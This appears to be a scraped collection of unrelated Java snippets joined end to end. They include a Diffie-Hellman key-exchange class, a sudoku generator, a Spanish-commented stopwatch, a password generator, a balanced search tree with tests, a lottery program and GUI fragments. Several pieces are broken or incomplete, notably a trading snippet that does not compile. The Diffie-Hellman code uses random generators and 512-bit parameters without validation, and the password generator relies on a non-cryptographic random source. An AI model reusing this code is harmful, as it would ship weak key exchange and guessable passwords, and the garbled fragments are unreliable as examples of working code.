this.A = this.g.modPow(a, p);
initDone = true;
}
/**
* Initializes the instance with the default bit-length 1024
*/
public void init()
{
init(1024);
}
/**
* Initializes the instance with the given bitLength
*/
public void init(int bitLength)
{
if (rand == null)
{
rand = new SecureRandom();
}
if (this.side == PARTNER_A)
{
this.g = BigInteger.probablePrime(bitLength, rand);
this.p = BigInteger.probablePrime(bitLength, rand);
this.a = BigInteger.probablePrime(bitLength, rand);
this.A = this.g.modPow(a, p);
}
else if (this.side == PARTNER_B)
{
this.b = BigInteger.probablePrime(bitLength, rand);
}
initDone = true;
}
/**
* @return Returns the key, if already calculated
* @throws RuntimeException If the key hast not been calculated yet.
*/
public byte[] getKey()
{
if (this.K == null)
{
throw new RuntimeException("The key has not been calculated yet.");
}
return K;
}
/**
* Calculates the key for side B (therefore <code>assert(side == PARTNER_B)</code>).
* @param g Parameter <code>g</code>
* @param p Parameter <code>p</code>
* @param A Parameter <code>A</code>
* @return Returns the calculated key
* @throws UnsupportedOperaionException If this instance has been inizialied as PARTNER_A
* @throws RuntimeException If the parameters are not initialized
*/
public byte[] getKey(BigInteger g, BigInteger p, BigInteger A)
{
if (this.side != PARTNER_B)
{
throw new UnsupportedOperationException("This method only works for PARTNER_B instances.");
}
if (!this.initDone)
{
throw new RuntimeException("The object has to be initialized.");
}
this.B = g.modPow(b, p);
this.K = A.modPow(b, p).toByteArray();
return K;
}
/**
* Calculates the key for side A (therefore <code>assert(side == PARTNER_A)</code>).
* @param g Parameter <code>g</code>
* @param p Parameter <code>p</code>
* @param A Parameter <code>A</code>
* @return Returns the calculated key
* @throws UnsupportedOperaionException If this instance has been inizialied as PARTNER_B
*/
public byte[] getKey(BigInteger B)
{
if (this.side != PARTNER_A)
{
throw new UnsupportedOperationException("This method only works for PARTNER_A instances.");
}
if (!this.initDone)
{
throw new RuntimeException("The object has to be initialized.");
}
this.K = B.modPow(a, p).toByteArray();
return K;
}
public BigInteger getG()
{
return g;
}
public BigInteger getP()
{
return p;
}
public BigInteger getA()
{
return A;
}
public BigInteger getB()
{
return B;
}
}
// Partner A
DiffieHellman dh = new DiffieHellman(DiffieHellman.PARTNER_A);
dh.init(512);
sendToOtherSide(dh.getG());
sendToOtherSide(dh.getP());
sendToOtherSide(dh.getA());
byte[] key = dh.getKey(receiveFromOtherSide());
// Partner B
DiffieHellman dh = new DiffieHellman(DiffieHellman.PARTNER_B);
dh.init(512);
BigInteger g = receiveFromOtherSide();
BigInteger p = receiveFromOtherSide();
BigInteger A = receiveFromOtherSide();
byte[] key = dh.getKey(g, p, A);
sendToOtherSide(dh.getB());
private int[][] createSudoku()
{
int[][] field = new int[9][9];
for(int i = 0; i < field.length; i++)
{
int[] rand;
do {
rand = createRandomRange();
System.arraycopy(rand, 0, field[i], 0, rand.length);
}
while(!proofIntField(field));
}
return field;
}
private boolean proofIntField(int[][] field)
{
for(int i = 0; i < field.length; i++)
{
if(!proofNoDuplicate(field[i])) {
return false;
}
}
for(int i = 0; i < 9; i++)
{
int[] temp = new int[9];
for(int j = 0; j < 9; j++)
{
temp[j] = field[j][i];
}
if(!proofNoDuplicate(temp)) {
return false;
}
}
for(int i = 0; i < 9; i += 3)
{
for(int j = 0; j < 9; j += 3)
{
int[] temp = new int[9];
int h = 0;
for(int k = 0; k < 3; k++)
{
for(int g = 0; g < 3; g++)
{
temp[h] = field[i+k][j+g];
h++;
}
}
if(!proofNoDuplicate(temp)) {
return false;
}
}
}
return true;
}
private boolean proofNoDuplicate(int[] field)
{
int[] temp = new int[9];
for(int i = 0; i < field.length; i++)
{
if(field[i] != 0) {
for(int j:temp)
{
if(j == field[i]) {
return false;
}
}
temp[i] = field[i];
}
}
return true;
}
private int[] createRandomRange()
{
int[] field = new int[9];
ArrayList<Integer> list = new ArrayList<Integer>();
for(int i = 1; i <= 9; i++)
{
list.add(i);
}
Collections.shuffle(list);
for(int i = 0; i < 9; i++)
{
field[i] = list.get(i).intValue();
}
return field;
}
package CronoMetro;
import java.util.HashMap;
/**
* <p>Con ello la clase ayuda a calcular y a emitir fácilmente tiempos de
* ejecuciones de aplicaciones.</p>
* <p>Después de la instanciación el método arranque() debe ser llamado para definir un
* tiempo de inicio. </p>
* <p>Después de la terminación del programa se finaliza el cronometraje con fin(), después de esto
* los valores del intervalo están disponibles:</p>
* <p>El intervalo total convertido en</p>
* <ul>
* <li>Nanosegundos</li>
* <li>Milisegundos</li>
* <li>Segundos</li>
* <li>Minutos</li>
* <li>Horas</li>
* <li>Días</li>
* <li>El intervalo convertido legiblemente</li>
* </ul>
* @author Dominik Sust
* @creation 07.07.2014 09:20:36
* @version 1.0
*/
public class CronoMetro
{
//Arranque y tiempo de finalización en nanosegundos
private long startTime = 0L;
private long endTime = 0L;
//Intervalos
private long intervalInNanoseconds;
private double intervalInMilliseconds;
private double intervalInSeconds;
private double intervalInMinutes;
private double intervalInHours;
private double intervalInDays;
//Intervalo total
private HashMap<String, Integer> totalInterval = new HashMap<String, Integer>();
/**
* Arranca el cronometraje
* Esa función puede ser llamada sólo una vez para que no pueda ocurrir un intervalo
* de tiempo negativo. Solo se registrará la primera llamada,
* las llamadas posteriores serán ignoradas.
*/
public void arranque()
{
if ( startTime == 0L )
{
startTime = System.nanoTime();
}
}
/**
* Finaliza el cronometraje.
* Esta función puede ser llamada varias veces para calcular varios
* (con medida a la primera llamada
* arranque()). Después de la llamada de este método los valores de los resultados están
* disponibles.
*/
public void fin()
{
endTime = System.nanoTime();
calculaTiempos();
}
/**
* Función interna que calcula todos los intervalos
*/
private void calculaTiempos()
{
//Intervalos totales
intervalInNanoseconds = endTime - startTime;
intervalInMilliseconds = (double) intervalInNanoseconds / (double) 1000000;
intervalInSeconds = intervalInMilliseconds / (double) 1000;
intervalInMinutes = (double) intervalInSeconds / (double) 60;
intervalInHours = intervalInMinutes / (double) 60;
intervalInDays = intervalInHours / (double) 24;
//Intervalos totales en días, horas, minutos, segundos
double oneSecondInMS = 1000.0;
double oneMinuteInMS = 60000.0;
double oneHourInMS = 3600000.0;
double oneDayInMS = 86400000.0;
//Calcular días
double tempInterval = intervalInMilliseconds;
int temp = (int) (tempInterval / oneDayInMS);
totalInterval.put( "Days", temp );
//Quitar los días calculados del intervalo total
tempInterval -= temp * oneDayInMS;
//Calcular horas
temp = (int) (tempInterval / oneHourInMS);
totalInterval.put( "Hours", temp );
//Quitar las horas calculados del intervalo total
tempInterval -= temp * oneHourInMS;
//Calcular minutos
temp = (int) (tempInterval / oneMinuteInMS);
totalInterval.put( "Minutes", temp );
// Quitar los minutos calculados del intervalo total
tempInterval -= temp * oneMinuteInMS;
//Calcular segundos
temp = (int) (tempInterval / oneSecondInMS);
totalInterval.put( "Seconds", temp );
//Quitar los segundos calculados del intervalo total
tempInterval -= temp * oneSecondInMS;
//¿¿Milisegundos??
totalInterval.put( "Milliseconds", (int) tempInterval );
}
/**
* Retorna el intervalo total en nanosegundos.
* Esta función suministra solamente un valor válido después de que los métodos
* arranque() y fin() son llamados
* @return El intervalo total en nanosegundos
*/
public long getIntervalInNanoseconds()
{
return intervalInNanoseconds;
}
/**
* Retorna el intervalo total en milisegundos.
* Esta función suministra solamente un valor válido después de que los métodos
* arranque() y fin() son llamados
* @return El intervalo total en milisegundos
*/
public double getIntervalInMilliseconds()
{
return intervalInMilliseconds;
}
/**
* Retorna el intervalo total en segundos.
* Esta función suministra solamente un valor válido después de que los métodos
* arranque() y fin() son llamados
* @return El intervalo total en segundos
*/
public double getIntervalInSeconds()
{
return intervalInSeconds;
}
/**
* Retorna el intervalo total en minutos.
* Esta función suministra solamente un valor válido después de que los métodos
* arranque() y fin() son llamados
* @return El intervalo total en minutos
*/
public double getIntervalInMinutes()
{
return intervalInMinutes;
}
/**
* Retorna el intervalo total en horas.
* Esta función suministra solamente un valor válido después de que los métodos
* arranque() y fin() son llamados
* @return El intervalo total en horas
*/
public double getIntervalInHours()
{
return intervalInHours;
}
/**
* Retorna el intervalo total en días.
* Esta función suministra solamente un valor válido después de que los métodos
* arranque() y fin() son llamados
* @return El intervalo total en días
*/
public double getIntervalInDays()
{
return intervalInDays;
}
/**
* <p>Retorna una Hashmap con los valores del intervalo.</p>
* <p>Llaves son</p>
* <ul>
* <li>Days</li>
* <li>Hours</li>
* <li>Minutes</li>
* <li>Seconds</li>
* <li>Milliseconds</li>
* </ul>
* <p>Con eso se puede elaborar una salida individual del intervalo.</p>
* @return HashMap<String, Integer>
*/
public HashMap<String, Integer> getTotalInterval()
{
return totalInterval;
}
/**
* <p>Retorna el intervalo en forma de strings totales.</p>
* <p>Ejemplo:<br>
* 2 días, 4 horas, 40 minutos, 38 segundos, 456 milisegundos</p>
* <p>Si no se necesita todos los valores se puede elaborar por medio del
* metodo getTotalInterval() una propia salida.</p>
*
* @return El intervalo en forma de string
*/
public String totalIntervalToString()
{
int d = totalInterval.get( "Days" );
int h = totalInterval.get( "Hours" );
int min = totalInterval.get( "Minutes" );
int s = totalInterval.get( "Seconds" );
int ms = totalInterval.get( "Milliseconds" );
String result = d+" dia, "+h+" hora, "+min+" minuto, "+s+" segundo, "+ms+" milisegundo";
//Días
if ( d != 1 )
{
result = result.replace( "dia", "dias");
}
//Horas
if ( h != 1 )
{
result = result.replace( "hora", "horas");
}
//Minutos
if ( min != 1 )
{
result = result.replace( "minuto", "minutos");
}
//Segundos
if ( s != 1 )
{
result = result.replace( "segundo", "segundos");
}
//Milisegundos
if ( ms != 1 )
{
result = result.replace( "milisegundo", "milisegundos");
}
return result;
}
/**
* <p>Emite todos los valores del objeto en el siguiente orden:</p>
* <ul>
* <li>startTime</li>
* <li>endTime</li>
* <li>intervalInNanoseconds</li>
* <li>intervalInMilliseconds</li>
* <li>intervalInSeconds</li>
* <li>intervalInMinutes</li>
* <li>intervalInHours</li>
* <li>intervalInDays</li>
* <li>La salida del metodo totalIntervalToString()</li>
* </ul>
* @return String
*/
@Override
public String toString()
{
return "IntervalUtil{"
+ "startTime=" + startTime
+ ",\n endTime=" + endTime
+ ",\n intervallInNanoseconds=" + intervalInNanoseconds
+ ",\n intervallInMilliseconds=" + intervalInMilliseconds
+ ",\n intervallInSeconds=" + intervalInSeconds
+ ",\n intervallInMinutes=" + intervalInMinutes
+ ",\n intervallInHours=" + intervalInHours
+ ",\n intervallInDays=" + intervalInDays
+ ",\n " + totalIntervalToString() + "'}'";
}
}
import java.util.Random; //importar
import java.util.Scanner; //importar
public class GenCont {
public static void main(String[] args) {
Scanner s = new Scanner (System.in); //Crear un nuevo objeto de la clase Scanner
int largo, seleccion; //inicializar las variables para la selección y el largo de la contraseña
System.out.println("Hola y bienvenido");
System.out.println("Por favor ingrese el largo de la contraseña y a continuación presione Enter:");
largo = s.nextInt(); //Selección del largo
System.out.println("Por favor haga una selección: \n1. Solamente números \n2. Solamente letras \n3. Alfanúmerico");
seleccion = s.nextInt(); //Selección de la clase de contraseña
System.out.println(creacont(seleccion, largo)); // Llamada del método para la generación de la contraseña
}
private static char[] creacont( int seleccion, int largo) {
char[] cont;
cont = new char[largo];
int contador = 0;
switch (seleccion) {
case 1:
while (contador<largo) {
cont[contador] = intercambionumero(numeroaleatorio(10, 26));
contador++;
}
break;
case 2:
while (contador<largo) {
cont[contador] = intercambionumero(numeroaleatorio(26, 0));
contador++;
}
break;
case 3:
while (contador<largo) {
cont[contador] = intercambionumero(numeroaleatorio(36, 0));
contador++;
}
break;
}
return cont;
}
private static int numeroaleatorio(int limitea, int limiteb) {
Random cont = new Random();
return cont.nextInt(limitea)+limiteb; //Creación de un número aleatorio
}
private static char intercambionumero(int numero){ //Genera letras y números a partir de los números transmitidos
String s = "abcdefghijklmnopqrstuvwxyz0123456789"; //Definir las/los posibles letras/números
char[] c = s.toCharArray(); //Convertir el String en Char para que pueda abordar a las letras individualmente
return c[numero]; //Distribuye la letra respectiva
}
}
package de.kneitzel.lib.collections;
/**
* A binary search tree that is always balanced.
* @param <T> Type of the values to store inside the tree.
*/
public class BalancedBinarySearchTree<T extends Comparable<T>> {
/**
* Gets the size of the BalancedBinarySearchTree
* @return Numbe of elements inside the BalancedBinarySearchTree
*/
public int size() {
return rootNode != null ? rootNode.count : 0;
}
/**
* Root node of the BalancedBinarySearchTree.
*/
private BalancedBinarySearchTreeNode<T> rootNode;
/**
* Add an element to the BalancedBinarySearchTree
* @param item
* @return The item.
*/
public T put(T item) {
if (rootNode == null) {
rootNode = new BalancedBinarySearchTreeNode<>(item);
} else {
rootNode.put(item);
}
return item;
}
/**
* Remove an item of the BalancedBinarySearchTree
* @param item Item to remove.
* @return The item removed or null if not found.
*/
public T remove(T item)
{
if (rootNode == null)
return null;
// Get the element first
T element = rootNode.remove(item);
if (rootNode.item == null) {
rootNode = null;
}
// return the element.
return element;
}
/**
* Checks the BalancedBinarySearchTree. This is just an internal method which is used to unit-test the implementation.
* @return Should always return true.
*/
public boolean check()
{
return rootNode == null ? true : rootNode.check();
}
/**
* Searches if an item is inside the BalancedBinarySearchTree.
* @param item Item to search for.
* @return the Item if found else null.
*/
public T find(T item)
{
return rootNode == null ? null : rootNode.find(item);
}
/**
* Tree node of the BalancedBinarySearchTree
* @param <T> Type of the values to store inside the node.
*/
protected class BalancedBinarySearchTreeNode<T extends Comparable<T>> {
/**
* Item stored inside the BalancedBinarySearchTreeNode.
*/
public T item;
/**
* Child Nodes.
*/
public BalancedBinarySearchTreeNode<T> left, right; // left and right child
/**
* Number of items stored inside the node and all subnodes.
*/
public int count;
/**
* Height of this subtree.
*/
public int height;
/**
* Creates a new instance of type BalancedBinarySearchTreeNode.
* @param item Item to store inside this node.
*/
public BalancedBinarySearchTreeNode(T item) {
left = null;
right = null;
this.item = item;
count = 1;
height = 1;
}
/**
* Add the item to this subtree.
* @param item item to put.
*/
public void put(T item) {
// Compare the item to put with the stored item.
int comparison = item.compareTo(this.item);
// Override the stored item if the comparison is 0
if (comparison == 0) {
this.item = item;
// Only the stored element was overridden so there is no change to count and height and
// no need to balance the tree.
return;
}
if (comparison < 0) {
// Store the item on the left side.
if (left == null)
left = new BalancedBinarySearchTreeNode<>(item);
else
left.put(item);
} else {
// Store the item on the right side.
if (right == null)
right = new BalancedBinarySearchTreeNode<>(item);
else
right.put(item);
}
// Increase count by one
count++;
// Balance the tree.
balance();
}
/**
* Check the balance of the tree and rebalance it if required.
*/
private void balance()
{
if ((left == null) && (right == null))
{
height = 1;
return;
}
int leftHeight = (left != null) ? left.height : 0;
int rightHeight = (right != null) ? right.height : 0;
if (leftHeight + 2 <= rightHeight)
turnLeft();
if (rightHeight + 2 <= leftHeight)
turnRight();
reCalculate();
}
/**
* Switch the Elements to the left
**/
private void turnLeft()
{
// First switch the items of this element with the right item
T temp = item;
item = right.item;
right.item = temp;
// Now set the references correctly
BalancedBinarySearchTreeNode<T> tempNode = right;
right = tempNode.right;
tempNode.right = tempNode.left;
tempNode.left = left;
left = tempNode;
left.reCalculate();
if (right != null) right.reCalculate();
}
/**
* Switch the elements to the right
**/
private void turnRight()
{
// First switch the items of this element with the right item
T temp = item;
item = left.item;
left.item = temp;
// Now set the references correctly
BalancedBinarySearchTreeNode<T> tempNode = left;
left = tempNode.left;
tempNode.left = tempNode.right;
tempNode.right = right;
right = tempNode;
if (left != null)
left.reCalculate();
right.reCalculate();
}
/**
* Calculate Height and Count of this node
**/
private void reCalculate()
{
// Set Count
count = 1 + (left == null ? 0 : left.count) + (right == null ? 0 : right.count);
// Set Height
int leftHeight = (left != null) ? left.height : 0;
int rightHeight = (right != null) ? right.height : 0;
height = ((leftHeight > rightHeight) ? leftHeight : rightHeight) + 1;
}
/**
* Remove the specified item.
* @param item Item to remove.
* @return the removed item.
*/
public T remove(T item)
{
// Compare with stored item
int compare = item.compareTo(this.item);
T value = null;
if (compare < 0)
{
// We have to search it on the left side.
if (left == null)
return null; // Not found.
else
{
value = left.remove(item);
if (left.item == null)
left = null;
}
} else if (compare > 0)
{
// We have to search it on the right side.
if (right == null)
return null; // Not found
else
{
value = right.remove(item);
if (right.item == null)
right = null;
}
} else
{
// Get an item from below if possible.
value = this.item;
this.item = null;
dive();
}
reCalculate();
return value;
}
/**
* The node with the null value is diving to the bottom of the tree and is removed afterwards.
*/
private void dive() {
if (right == null && left == null) {
return;
} else if (right == null) {
diveLeft();
} else if (left == null) {
diveRight();
} else {
if (right.height > left.height) {
diveLeft();
} else {
diveRight();
}
}
balance();
}
/**
* Continue diving on the left child.
*/
private void diveLeft() {
item = left.item;
left.item = null;
left.dive();
if (left.item == null)
left = null;
}
/**
* Continue diving on the right child.
*/
private void diveRight() {
item = right.item;
right.item = null;
right.dive();
if (right.item == null)
right = null;
}
public T find(T key)
{
// Compare with stored item
int compare = key.compareTo(item);
// Items are equal -> Throw exception
if (compare == 0)
return item;
if (compare < 0)
{
// We have to search it in the left subtree.
return left == null ? null : left.find(key);
}
// We have to search it in the right subtree.
return right == null ? null : right.find(key);
}
/**
* Check the subtree. Should always return true.
* @return Should always return true. If it returns false, something went wrong.
*/
public boolean check()
{
// Store the height of child-trees
int leftHeight = 0;
int rightHeight = 0;
// Check the left child
if (left != null)
{
// Recursive check!
if (!left.check()) return false;
// Check sorting of values
if (item.compareTo(left.item) <= 0)
return false;
leftHeight = left.height;
}
// Check the right child
if (right != null)
{
// Recursive check!
if (!right.check()) return false;
// Check sorting of values
if (item.compareTo(right.item) >= 0)
return false;
rightHeight = right.height;
}
// Compare Heights
if ((rightHeight - leftHeight > 1) || (leftHeight - rightHeight > 1))
return false;
// Last Check: Control Count
return count == 1 + (left == null ? 0 : left.count) + (right == null ? 0 : right.count);
}
}
}
package de.kneitzel.lib.collections;
/**
* Dictionary which uses the Balanced Binary Search Tree.
*/
public class BTreeMap<K extends Comparable<K>, V> {
/**
* A set of key and value to store the dictionary data inside the BTree.
* @param <K> Key type.
* @param <V> Value type.
*/
protected class DataSet<K extends Comparable<K>, V> implements Comparable<DataSet<K,V>>{
public K key;
public V value;
public DataSet(K key) {
this.key = key;
}
public DataSet(K key, V value) {
this.key = key;
this.value = value;
}
/**
* Compare the keys of the DataSets
* @param data The data to compare with.
* @return The result of the key comparisons.
*/
public int compareTo(DataSet<K,V> data) {
return key.compareTo(data.key);
}
}
private BalancedBinarySearchTree<DataSet<K,V>> values = new BalancedBinarySearchTree<>();
/**
* Get the value of a key.
* @param key Key for which the value is looked up.
* @return The value or null.
*/
public V get(K key) {
DataSet<K,V> valueSet = values.find(new DataSet<K,V>(key));
return valueSet != null ? valueSet.value : null;
}
/**
* Checks if the Dictionary is empty.
* @return true if the dictionary is empty, else true.
*/
public boolean isEmpty() {
return values.size() == 0;
}
/**
* Put a new (key, value) pair into the dictionary. If the key already exists, the value will be changed.
* @param key Key to use.
* @param value Value to store.
* @return
*/
public V put(K key, V value) {
values.put(new DataSet<K,V>(key, value));
return value;
}
/**
* Removes the (key, value) pair of the given key.
* @param key Key of the (key, value) pair that should be removed.
* @return The value of the key removed or null if not found.
*/
public V remove(K key) {
DataSet<K,V> value = values.remove(new DataSet(key, null));
return value!=null ? value.value : null;
}
/**
* Gets the number of elements stored inside the dictionary.
* @return Number of elements stored inside the dictionary.
*/
public int size() {
return values.size();
}
}
package de.kneitzel.lib.tests;
import static org.junit.Assert.*;
import de.kneitzel.lib.collections.BalancedBinarySearchTree;
import de.kneitzel.lib.collections.BTreeMap;
import org.junit.Test;
/**
* Tests for de.kneitzel.lib.collections
*/
public class CollectionsTests {
@Test
public void BalancedBinarySearchTreeTest()
{
BalancedBinarySearchTree<String> tree = new BalancedBinarySearchTree<>();
assertTrue(tree.check());
assertEquals(tree.size(), 0);
assertEquals(tree.put("aaa"), "aaa");
assertTrue(tree.check());
assertEquals(tree.size(), 1);
assertEquals(tree.put("bbb"), "bbb");
assertTrue(tree.check());
assertEquals(tree.size(), 2);
assertEquals(tree.put("ccc"), "ccc");
assertTrue(tree.check());
assertEquals(tree.size(), 3);
assertEquals(tree.put("ddd"), "ddd");
assertTrue(tree.check());
assertEquals(tree.size(), 4);
assertEquals(tree.put("eee"), "eee");
assertTrue(tree.check());
assertEquals(tree.size(), 5);
assertEquals(tree.put("xxx"), "xxx");
assertTrue(tree.check());
assertEquals(tree.size(), 6);
assertEquals(tree.put("yyy"), "yyy");
assertTrue(tree.check());
assertEquals(tree.size(), 7);
assertEquals(tree.put("zzz"), "zzz");
assertTrue(tree.check());
assertEquals(tree.size(), 8);
assertEquals(tree.put("iii"), "iii");
assertTrue(tree.check());
assertEquals(tree.size(), 9);
assertEquals(tree.put("jjj"), "jjj");
assertTrue(tree.check());
assertEquals(tree.size(), 10);
assertEquals(tree.find("aaa"), "aaa");
assertEquals(tree.find("bbb"), "bbb");
assertEquals(tree.find("ccc"), "ccc");
assertEquals(tree.find("ddd"), "ddd");
assertNull(tree.find("fff"));
try {
assertEquals(tree.remove("ccc"), "ccc");
assertEquals(tree.size(), 9);
} catch (Exception e)
{
fail("Shouldn't throw an exception!");
}
assertNull(tree.find("ccc"));
assertEquals(tree.find("aaa"), "aaa");
assertEquals(tree.find("bbb"), "bbb");
assertEquals(tree.find("ddd"), "ddd");
}
@Test
public void BTreeMapTest() {
BTreeMap<String, String> map = new BTreeMap<>();
assertTrue(map.isEmpty());
assertEquals(map.size(), 0);
assertNull(map.get("test"));
assertEquals(map.put("aaa", "AAA"), "AAA");
assertEquals(map.size(), 1);
assertFalse(map.isEmpty());
assertEquals(map.get("aaa"), "AAA");
assertFalse(map.isEmpty());
assertEquals(map.remove("aaa"), "AAA");
assertEquals(map.size(), 0);
assertTrue(map.isEmpty());
assertEquals(map.put("aaa", "AAA"), "AAA");
assertEquals(map.size(), 1);
assertFalse(map.isEmpty());
assertEquals(map.put("bbb", "BBB"), "BBB");
assertEquals(map.size(), 2);
assertFalse(map.isEmpty());
assertEquals(map.put("ccc", "CCC"), "CCC");
assertEquals(map.size(), 3);
assertFalse(map.isEmpty());
assertEquals(map.put("ddd", "DDD"), "DDD");
assertEquals(map.size(), 4);
assertFalse(map.isEmpty());
assertEquals(map.put("eee", "EEE"), "EEE");
assertEquals(map.size(), 5);
assertFalse(map.isEmpty());
assertNull(map.get("fff"));
assertNull(map.remove("fff"));
assertEquals(map.get("aaa"), "AAA");
assertFalse(map.isEmpty());
assertEquals(map.get("bbb"), "BBB");
assertFalse(map.isEmpty());
assertEquals(map.get("ccc"), "CCC");
assertFalse(map.isEmpty());
assertEquals(map.get("ddd"), "DDD");
assertFalse(map.isEmpty());
assertEquals(map.get("eee"), "EEE");
assertFalse(map.isEmpty());
assertEquals("BBB", map.remove("bbb"));
assertFalse(map.isEmpty());
assertEquals("CCC", map.remove("ccc"));
assertFalse(map.isEmpty());
assertEquals(map.remove("ddd"), "DDD");
assertFalse(map.isEmpty());
assertEquals(map.remove("aaa"), "AAA");
assertFalse(map.isEmpty());
assertEquals(map.remove("eee"), "EEE");
assertTrue(map.isEmpty());
assertNull(map.get("fff"));
assertNull(map.remove("fff"));
}
}
public class CandleStickAnalyse {
public static void main(String[] args) {
// TODO Auto-generated method stub
double mystoploss=0;
double mytarget=0;
double myfill=0;
double bar=0;
double valorcomercial=0;
double [] open= new double[2];
double [] close= new double[2];
double[] buyarray=new double[2];
double[] sellarray= new double[2];
boolean redcandle;
boolean greencandle;
//
if (stoploss<=bar<=mytarget) {
//if you have a red candle, buy at start of next bar
//(Fijar los criterios de compra o de mercado de entrada):
if (redcandle=true) {
if (close[0]<open[0]) {
// buy next bar at market
buy(valorcomercial);
//...
// En close y open hay precios de apertura y de cierre nuevos y viejos
}
//if we are in a position and have a green candle, get out\\
//Fijar los criterios de salidas de ventas o del mercado, si en condición de posición
if(greencandle=true) {
if (close[0]>open[0])&(valorcomercial>0) {
//if we are in a position and have a green candle, get out
sell(valorcomercial);
}
}
void buy() {
buyarray[1]=valorcomercial;
}
void sell() {
sellarray[1]=valorcomercial;
}
}
}
}
}
// Probablemente falta mucho aquí, pero esto es un proyecto de diversión ;)
jTextArea1.addKeyListener(new java.awt.event.KeyListener() {
@Override
public void keyTyped(KeyEvent e) {
}
@Override
public void keyPressed(KeyEvent e) {
}
@Override
public void keyReleased(KeyEvent e) {
if (e.getKeyCode() == 114) {
seguirbuscando();
}
}
});
private void seguirbuscando(String palabraclave) {
}
if (e.getKeyCode() == 114) {
seguirbuscando(palabraclave);
}
private void seguirbuscando() {
int posicioncursor = jTextArea1.getCaretPosition();
if (posicioncursor == jTextArea1.getText().length()) {
posicioncursor = 0 -palabraclave.length();
}
posicioncursor = posicioncursor + CursorNext(palabraclave);
jTextArea1.setCaretPosition(posicioncursor);
jTextArea1.select(posicioncursor, posicioncursor + palabraclave.length());
}
private int CursorNext(String busqueda) {
String b;
try {
b = jTextArea1.getText().toLowerCase().substring(jTextArea1.getCaretPosition() + busqueda.length());
} catch (Exception e) {
b = jTextArea1.getText().toLowerCase();
jTextArea1.setCaretPosition(0);
}
int posicioncursor = (busqueda + b.split(busqueda.toLowerCase())[0]).length();
return posicioncursor;
}
public class loteria {
public static void main(String[] args){
int givenValue[] = new int[6];
int randomValue[] = new int[6];
int hits = 0; //para números encontrados
givenValue = determineGivenNumbers(); //Metodo para UserInput
randomValue = determineRandomNumbers(); //Metodo para generar números aleatorios
hits = checkForEquality(givenValue, randomValue); //Comprueba los Arrays en igualdad
printArrays(givenValue, randomValue, hits); //Da los Arrays y los blancos hallados
binomialcoeficiente(); //Calcular la probabilidad de 6 blancos de 49
}
/*----------------------------UserInput---------------------------------------*/
public static int[] determineGivenNumbers(){
int givenValue[] = new int[6];
Scanner scan = new Scanner(System.in);
int checkGivNumber = 0; //Para que no se pueda ingresar números iguales
boolean numOrLetter = false;//Para que no se pueda ingresar letras
System.out.println("Please enter six numbers 1-49!");
Böö: for(int i=0; i<givenValue.length; i++){
do{
try{
numOrLetter = false;
checkGivNumber = scan.nextInt();
}catch(Exception e){
System.err.println("Please enter a valid number! " + e.toString());
scan.nextLine();
numOrLetter = true; //Error si se ingresa una letra; preguntar de nuevo
}
if(checkGivNumber <= 0 || checkGivNumber > 49) System.err.println("Please give a number in the specifield range!");
}while(checkGivNumber <= 0 || checkGivNumber > 49 || numOrLetter == true);
for(int j=0; j<i; j++){
if(givenValue[j] == checkGivNumber){ //Por si el número se ingresó dos veces
System.err.println("The entered number is already exists!");
System.out.println("Please enter a new number!");
i--; //Entonces cuando el mismo número no sigue iterando el bucle for
continue Böö; //Entonces ve hacia Böö, entonces despues de continue no se ejecuta mas nada
}
}
givenValue[i] = checkGivNumber;
}
Arrays.sort(givenValue);
return givenValue;
}
/*----------------------------------------------------------------------------*/
/*--------------------------Random Números aleatorios----------------------------*/
public static int[] determineRandomNumbers(){
int randomValue[] = new int[6];
Random rNumber = new Random();
int checkRanNumber = 0; //Para que no se generen números random iguales
Böö: for(int i=0; i<randomValue.length; i++){
checkRanNumber = rNumber.nextInt(49)+1;
for(int j=0; j<i; j++){
if(randomValue[j] == checkRanNumber){
i--;
continue Böö;
}
}
randomValue[i] = checkRanNumber;
}
Arrays.sort(randomValue);
return randomValue;
}
/*----------------------------------------------------------------------------*/
/*------------------------Comprobar Arrays en igualdad------------------------*/
public static int checkForEquality(int givenValue[], int randomValue[]){
int hits = 0;
//Comprobar en Array cuantos números son iguales
for(int j=0; j<randomValue.length; j++){
for(int i=0; i<givenValue.length; i++){
if(givenValue[i] == randomValue[j]){
hits++;
}
}
}
return hits;
}
/*----------------------------------------------------------------------------*/
/*-----------------Dar los Arrays y los blancos hallados -------------------*/
public static void printArrays(int givenValue[], int randomValue[], int hits){
for(int i : givenValue){
System.out.print(i + "\t");
}
System.out.println();
for(int i : randomValue){
System.out.print(i + "\t");
}
System.out.println("You have " + hits + " hits!");
}
/*----------------------------------------------------------------------------*/
/*-----------Calcular la probabilidad de 6 de 49 blancos ------------*/
public static void binomialcoeficiente(){
BigInteger result = BigInteger.ONE;
int n = 49;
int k = 6;
result = faculty(n).divide(faculty(k).multiply((faculty(n-k))));
System.out.println("The propability for six correct hits are 1 : " + result);
double d1 = result.doubleValue(); //Convertir el valor BigIntegerden en double
System.out.println(1/d1 + " %"); //Para que pueda ser especificado en porción %
}
//Al mismo tiempo los objetos BigInteger se harán tan grandes,
//como los respectivos resultados necesitan espacio
public static BigInteger faculty(int number){
if(number <= 1) return BigInteger.ONE;
return BigInteger.valueOf(number).multiply(faculty(number-1));
//BigInteger.valueOf(long val) produce un BigInteger que acepta el valor val
//Con .multiply se hace this * multiply(número)
}
}
package com.example.myapplication;
import android.os.Bundle;
import android.view.View;
import android.app.Activity;
public class Bienvenido extends Activity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_Bienvenido);
}
}
public class LookAndFeel
{
private static ArrayList<LookAndFeelInfo> installedLookAndFeels=new ArrayList<>();
static
{
Collections.addAll(installedLookAndFeels,UIManager .getInstalledLookAndFeels());
}
public static ArrayList<LookAndFeelInfo> getInstalledLookAndFeels()
{
return installedLookAndFeels;
}
public static String getLookAndFeelClassByName(String name)
{
for(LookAndFeelInfo lookAndFeelInfo:installedLookAndFeels)
{
if(lookAndFeelInfo.getName().equalsIgnoreCase(name ))
{
return lookAndFeelInfo.getClassName();
}
}
return UIManager.getSystemLookAndFeelClassName();
}
}
private javax.swing.JComboBox<String> lfComboBox;
...
lfComboBox = new javax.swing.JComboBox<String>();
lfComboBox.setModel(new DefaultComboBoxModel<String>());
.....
for(LookAndFeelInfo value:LookAndFeel.getInstalledLookAndFeels())
{
lfComboBox.addItem(value.getName());
}
try
{
//Colocar el LookAndFeel que se elige en el ComboboxDas en el UIManager
UIManager.setLookAndFeel(LookAndFeel.getLookAndFee lClassByName((String)lfComboBox.getSelectedItem()) );
